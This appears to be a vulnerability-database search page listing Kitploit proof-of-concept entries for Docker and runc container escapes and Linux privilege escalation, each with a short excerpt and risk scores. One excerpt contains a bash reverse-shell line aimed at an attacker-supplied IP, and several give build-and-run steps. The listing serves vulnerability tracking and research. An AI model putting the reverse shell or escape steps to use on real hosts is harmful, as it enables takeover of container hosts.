Lucene search
+L

1289 matches found

Kitploit
Kitploit
‱added 2026/09/22 2:07 a.m.‱10 views

container-escape-ebpf

White Paper https://www.scs-europe.net/dlib/2026/2026-0321.html Assumptions Host runs vulnerable version of runc: For CVE-2025-31133: 1.2.7 and below, 1.3.0-rc.1 through 1.3.2, 1.4.0-rc.1 and 1.4.0-rc.2. For CVE-2024-21626: 1.0.0-rc93 through 1.1.11. Unprivileged user is able to create containers...

8.6CVSS7.3AI score0.18087EPSS
SaveExploits20
Kitploit
Kitploit
‱added 2026/09/22 1:24 a.m.‱6 views

cve-2019-5736-poc

CVE-2019-5736 Proof of Concept This appends a string to the host runc binary. Bring your own payload see stage2.c. To run: docker build -t cve . docker run cve strings /usr/bin/docker-runc | tail -n 2...

9.3CVSS7.2AI score0.98452EPSS
SaveExploits35
Kitploit
Kitploit
‱added 2026/09/21 11:34 p.m.‱12 views

CVE-2021-41091

CVE-2021-41091 A bug in Moby Docker Engine allows unprivileged users to traverse directories and execute programs directly from the container on the host machine. If there is a suid program in the container, the user will be able to execute it as suid on the host machine. PoC In the container's...

6.3CVSS7AI score0.02848EPSS
SaveExploits3
Kitploit
Kitploit
‱added 2026/09/21 11:08 p.m.‱9 views

CVE-2022-0847-Container-Escape

CVE-2022-0847 CVE-2022-0847 used to achieve container escape overwrite any read-only files on host Slides in Chinese available here ćˆ©ç”šCVE-2022-0847 Dirty Pipe 漞现ćźčć™šé€ƒé€žïŒˆæ•ˆæžœäžșèŠ†ć†™ćźżäž»æœș䞊任意ćȘèŻ»æ–‡ä»¶ïŒ‰ 䞭文汇抄PPTćœšèż™é‡Œ Introduction If the kernel is vulnerable to CVE-2022-0847, the attacker can overwrite read-only files...

7.8CVSS7.5AI score0.89721EPSS
SaveExploits102References1
Kitploit
Kitploit
‱added 2026/09/21 10:11 p.m.‱10 views

CVE-2025-9074

CVE-2025-9074 – Docker Desktop Windows Container→Host Write via Exposed Engine API Author: w01f Status: Proof-of-Concept educational / authorized testing only Overview This project demonstrates a PoC for CVE-2025-9074 , a misconfiguration/exposure in certain versions of Docker Desktop for Windows...

9.3CVSS8.1AI score0.01629EPSS
SaveExploits15
Kitploit
Kitploit
‱added 2026/09/21 8:25 p.m.‱14 views

Learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc Overview A proof-of-concept demonstration and learning environment for CVE-2025-31133 , a security vulnerability in runc that allows bypassing maskedPaths protection through a race condition. maskedPaths are designed to prevent containers from accessing sensitive ho...

7.8CVSS7.6AI score0.00841EPSS
SaveExploits2References2
Kitploit
Kitploit
‱added 2026/09/21 8:09 p.m.‱6 views

CVE-2024-21626-old-docker-versions

Container escape vulnerability in old runc components CVE-2024-21626 During my analysis about CVE-2024-21626 I found that other older docker components are vulnerable about fd leakage that is not mentioned in the security advisory GHSA-xr7r-f8xq-vfvv. Read my full article for detailed explanation...

8.6CVSS7AI score0.18087EPSS
SaveExploits18References3
Kitploit
Kitploit
‱added 2026/09/21 7:43 p.m.‱8 views

CVE-2024-21626-runcPOC

Vulnerability Reproduction CVE-2024-21626 docker runc Escape Vulnerability 1. Vulnerability Overview Vulnerability Name| docker runc Escape Vulnerability ---|--- CVE ID| CVE-2024-21626 Disclosure Date| 2024-01-31 Characteristic| / Affected Versions| runc @ v1.0.0-rc93, 1.1.11 2. Exploitation &...

8.6CVSS7.2AI score0.18087EPSS
SaveExploits18References3
Kitploit
Kitploit
‱added 2026/09/21 7:17 p.m.‱10 views

CVE-2026-5555-Container-Escape-via-proc-self-fd-Symlink-in-Shared-Volume

CVE-2026-5555 – Container Escape via /proc/self/fd Symlink Overview A shared volume mounted with rshared propagation allows a malicious container to create a symbolic link pointing to a host file through /proc/self/fd. The host process writing to the volume follows the symlink, overwriting critic...

7.5CVSS7.6AI score0.00259EPSS
SaveExploits0
Kitploit
Kitploit
‱added 2026/09/21 7:15 p.m.‱18 views

ipv6_frag_escape

IPV6FRAGESCAPE Una prueba de concepto fiable de escape de contenedor / jaula sin privilegios para CentOS / RHEL 10. Aprovecha un bug de fragmentaciĂłn IPv6 ya corregido en ip6appenddata cerrado upstream por 38becddc, sin CVE, un desbordamiento lineal dentro de la slab hacia skbsharedinfo en la col...

5.9AI score
SaveExploits0
Kitploit
Kitploit
‱added 2026/09/21 6:43 p.m.‱7 views

CVE-2022-0492-Container-Escape

CVE-2022-0492-Container-Escape CVE-2022-0492-Container-Escape Implemented in Go Reference links: https://github.com/chenaotian/CVE-2022-0492 https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/...

7.8CVSS7.3AI score0.05528EPSS
SaveExploits12References1
Kitploit
Kitploit
‱added 2026/09/21 4:41 p.m.‱8 views

cve-2019-5736-poc

Headers to Add stage2.c bash include bash include Modify to Attacker PC IP stage2.c bash const char poc = "!/bin/bash\n/bin/bash -i & /dev/tcp//4455 0&1 &\n"; Create Docker Image and Container root@kitploit: $ docker build -t cve . $ docker run -t -d --name cvetest cve $ sudo cp...

9.3CVSS7.2AI score0.98452EPSS
SaveExploits35
Kitploit
Kitploit
‱added 2026/09/21 3:06 p.m.‱13 views

poc-cve-2024-0132

poc-cve-2024-0132 Reproduce Env: os: ubuntu 22.04 with nvidia driver docker: v27.1.0 nvidia-container-toolkit: v1.16.1 Reproduce Step: run the poc container image Target: Access host files in the container Call docker daemon apis via the docker.sock in the container Reproduce use the prebuilt poc...

9CVSS8.3AI score0.40842EPSS
SaveExploits2References1
Kitploit
Kitploit
‱added 2026/09/21 2:28 p.m.‱10 views

CVE-2022-0847-Container-Escape

CVE-2022-0847-Container-Escape CVE-2022-0847 used to achieve container escape ćˆ©ç”šCVE-2022-0847 Dirty Pipe 漞现ćźč晹逃逾 äœżç”šgoèŻ­èš€ćźžçŽ°...

7.8CVSS7.3AI score0.89721EPSS
SaveExploits102
Kitploit
Kitploit
‱added 2026/09/21 12:57 p.m.‱11 views

docker_escape_pwn

Escape from Docker using CVE-2017-1000112 and CVE-2017-18344. Including: gaining root privilage get all capbilities namespace recovery filesystem recovery cgroup limitation bypass seccomp bypass...

7CVSS6.7AI score0.20797EPSS
SaveExploits25
Kitploit
Kitploit
‱added 2026/09/21 9:27 a.m.‱7 views

DirtyFrag

Local Privilege Escalation / Container Escape CVE-2026-43284 / CVE-2026-43500 Usage: CGOENABLED=0 go build -ldflags="-s -w" -o dirtyfrag . ./dirtyfrag Affected Versions: Ubuntu 24.04.4 LTS 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS 16.04 LTS 14.04 LTS RHEL 8.x,9.x,10.1 CentOS 8,9,10 Rocky Linux 8,9,...

8.8CVSS7.1AI score0.93235EPSS
SaveExploits35
Kitploit
Kitploit
‱added 2026/09/21 8:05 a.m.‱12 views

CVE-2025-31133

CVE-2025-31133 PoC Exploit This document explains the functionality of the provided Proof-of-Concept PoC script for the runc vulnerability CVE-2025-31133. Summary Vulnerability: CVE-2025-31133 - A symbolic link race condition in runc's maskedPaths handling. Impact: A malicious container can bypas...

7.8CVSS8.3AI score0.00841EPSS
SaveExploits2
Kitploit
Kitploit
‱added 2026/09/21 4:06 a.m.‱10 views

Docker-breakout-runc

Docker breakout via runc Originally from : https://github.com/Frichetten/CVE-2019-5736-PoC. This repo is simply me messing around with the PoC and attempting to figure the exploit's flow...

9.3CVSS7.2AI score0.98452EPSS
SaveExploits35References1
Kitploit
Kitploit
‱added 2026/09/21 2:14 a.m.‱9 views

rootpacket-cve-2026-31431

rootpacket CVE-2026-31431 A Linux Docker-to-host cryptojacking toolkit captured from live attacks on Kinryƫ Labs honeypots. It breaks in through an exposed Docker Engine API, escapes the container to root the host with CVE-2026-31431 , installs a kernel rootkit, and runs an XMRig Monero miner. Fu...

7.8CVSS6.5AI score0.99907EPSS
SaveExploits243
Kitploit
Kitploit
‱added 2026/09/21 2:11 a.m.‱10 views

CVE-2024-21626-demo

CVE-2024-21626-demo Demo for the LT at Container Runtime Meetup 5. This is to raise awareness of the attack risk based on publicly known information, and misuse is strictly prohibited. Slides Container Runtime Meetup 5 - Can You Really Trust That Image? Taking Host Root with CVE-2024-21626 Loggin...

8.6CVSS7.2AI score0.18087EPSS
SaveExploits18References2
Rows per page
Query Builder